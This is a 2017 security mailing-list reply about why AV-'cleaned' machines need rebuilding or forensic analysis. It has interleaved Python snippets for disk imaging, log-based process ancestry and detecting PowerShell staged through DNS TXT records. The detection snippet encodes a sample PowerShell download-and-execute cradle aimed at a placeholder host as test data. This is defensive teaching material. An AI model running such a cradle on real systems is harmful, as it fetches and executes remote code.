Educause Security Discussion mailing list archives

Re: viruses that have been cleaned or quarantined


From: Kevin Wilcox <wilcoxkm () APPSTATE EDU>
Date: Thu, 22 Jun 2017 14:39:28 -0400

On 22 June 2017 at 13:46, Frank Barton <bartonf () husson edu> wrote:

> This is a touchy subject in some cases, and I think there is a certain
> amount of subjectivity that needs to be brought into context.
>
> If the infection was contained before it was able to launch/take hold (i.e.
> AV prevented a file from being downloaded, or accessed after download), then
> "cleaning" is somewhat of a misnomer. Remove the infected file, and you're
> all set.

This is why we have such a difficult time with teaching our users the
right way to do things. They don't want to rebuild a system so they go
online to find some argument as to why they shouldn't have to, then we
(the royal we, the InfoSec/SecOps community we) have to spend time
telling them why this comment they found on a forum or mailing list is
being interpreted incorrectly instead of just getting on with proper
remediation. It's an educational moment but unless it happens
regularly enough to sink in, most just don't absorb it - or they think
something has changed in the last six months and malware is now less
aggressive, persistent or sneaky.

Without proper process auditing and logging, the one indicator AV
found could have been the first-stage dropper, the second-stage
malware, the third/fourth-stage crawler/persistence mechanism, or it
could have been simply an indicator of a longer-running problem *and
we have no way to know* without doing a forensic deep-dive. During
that deep-dive, the system has to be offline, a specialist has to burn
time doing an analysis and it's going to take at least three times as
long as just rebuilding the thing anyway -- that said, you really
SHOULD be taking an image of RAM and disk and you SHOULD be doing an
analysis to see if it crawled around, if data was stolen or if the
attacker was able to pivot...but that's expensive+++.
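The acquisition-and-verify step above can be sketched in a few lines. This is a minimal illustration, not a substitute for a proper forensic tool: it copies a source in chunks while hashing both sides so you can prove the image matches the original. The demo uses a temp file as a stand-in; on a real case the source would be a raw device node (e.g. a hypothetical /dev/sdX) opened read-only.

```python
import hashlib
import os
import tempfile

def acquire_image(src_path, dst_path, chunk_size=4 * 1024 * 1024):
    """Copy src to an image file, hashing both sides for integrity."""
    src_hash, dst_hash = hashlib.sha256(), hashlib.sha256()
    with open(src_path, "rb") as src, open(dst_path, "wb") as dst:
        while chunk := src.read(chunk_size):
            src_hash.update(chunk)
            dst.write(chunk)
            dst_hash.update(chunk)
    return src_hash.hexdigest(), dst_hash.hexdigest()

# Demo on a regular file; a real acquisition would read a raw device
# such as /dev/sdX (path is hypothetical) on the analysis host.
src = tempfile.NamedTemporaryFile(delete=False)
src.write(b"stand-in for suspect disk contents")
src.close()
image_path = src.name + ".dd"
h_src, h_img = acquire_image(src.name, image_path)
print(h_src == h_img)  # True when the image is bit-for-bit identical
os.unlink(src.name)
os.unlink(image_path)
```

The matching hashes are what let you do all later analysis against the image while the original evidence stays untouched.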

If that process auditing is in place then sure, you can make the case
that <foo> user was at <w> website, <a> ad loaded and caused <d>
dropper to run, the dropper pulled the current FF domain list from <t>
Twitter post over TLS, did <z> DNS lookup that grabbed <p> powershell
from a TXT lookup and ran it by calling <l> dll (versus being written
to disk and risking AV picking it up), but AV triggered and blocked
<x> trojan that it downloaded and accidentally wrote to disk - and
that that was *all* that happened. That caveat *always* gets left out
in the "but we caught it on download/execution" arguments - even
though it's the only way those arguments are valid.
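One link in that chain - PowerShell staged through a DNS TXT answer - is the kind of thing an analyst can hunt for in collected DNS logs. Here's a rough heuristic sketch; the record contents, function name and keyword list are all made up for illustration, not a detection rule anyone ships:

```python
import base64
import binascii
import re

# Tokens that commonly appear in PowerShell download cradles.
# This keyword list is an illustrative assumption, not exhaustive.
SUSPICIOUS = re.compile(
    r"(?i)\b(IEX|Invoke-Expression|DownloadString|FromBase64String)\b"
)

def txt_record_is_suspicious(txt: str) -> bool:
    """Flag a TXT record whose raw or base64-decoded text looks PowerShell-shaped."""
    candidates = [txt]
    try:
        decoded = base64.b64decode(txt, validate=True)
        candidates.append(decoded.decode("utf-8", "replace"))
    except (binascii.Error, ValueError):
        pass  # not valid base64; check only the raw string
    return any(SUSPICIOUS.search(c) for c in candidates)

benign = "v=spf1 include:_spf.example.com ~all"
staged = base64.b64encode(
    b"IEX (New-Object Net.WebClient).DownloadString('http://x/a.ps1')"
).decode()
print(txt_record_is_suspicious(benign), txt_record_is_suspicious(staged))
# False True
```

The point isn't the heuristic itself - it's that without the DNS logs there is nothing to run it against.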

Odds are if you have that level of auditing and alerting in place then
you probably have other mitigations like having powershell completely
removed in your environment, full application whitelisting and
complete SSL/TLS inspection. Short of being able to get that from a
central log store, it means a forensic analysis -- because, as you
pointed out, you can't trust anything (including the logs) on the
host.
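A central log store is what makes that possible: process-creation events shipped off the box can be trusted even when the box can't. A toy sketch of reconstructing an ancestry chain from such events (the event shape loosely mirrors Sysmon Event ID 1; the events themselves are fabricated):

```python
# Fabricated process-creation events, as they might land in a central
# log store after being shipped off the host at creation time.
events = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe"},
    {"pid": 204, "ppid": 100, "image": "firefox.exe"},
    {"pid": 310, "ppid": 204, "image": "rundll32.exe"},
    {"pid": 422, "ppid": 310, "image": "powershell.exe"},
]

def ancestry(pid, events):
    """Walk parent links back to the root, returning image names oldest-first."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))

print(" -> ".join(ancestry(422, events)))
# explorer.exe -> firefox.exe -> rundll32.exe -> powershell.exe
```

That ancestry is exactly the "<a> ad caused <d> dropper caused <p> powershell" narrative from earlier - reconstructed without asking the compromised host anything.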

I'm curious if just *one* school on security@ has full application
whitelisting with full process auditing in their entire environment,
and can tell me whether a single request to
https://twitter.com/<malwareHandle> was malicious. Responses off-list
are fine if you don't want to advertise it; on-list would be better so
the rest of us know who to grab and flood with questions at SPC!
Better yet, have everyone from your SecOps team put in an SPC proposal
on that topic so there's a higher chance of one of you getting to
present on it (if the 2018 committee members are reading, this is
something we desperately need either a presentation or BoF about!).

kmw
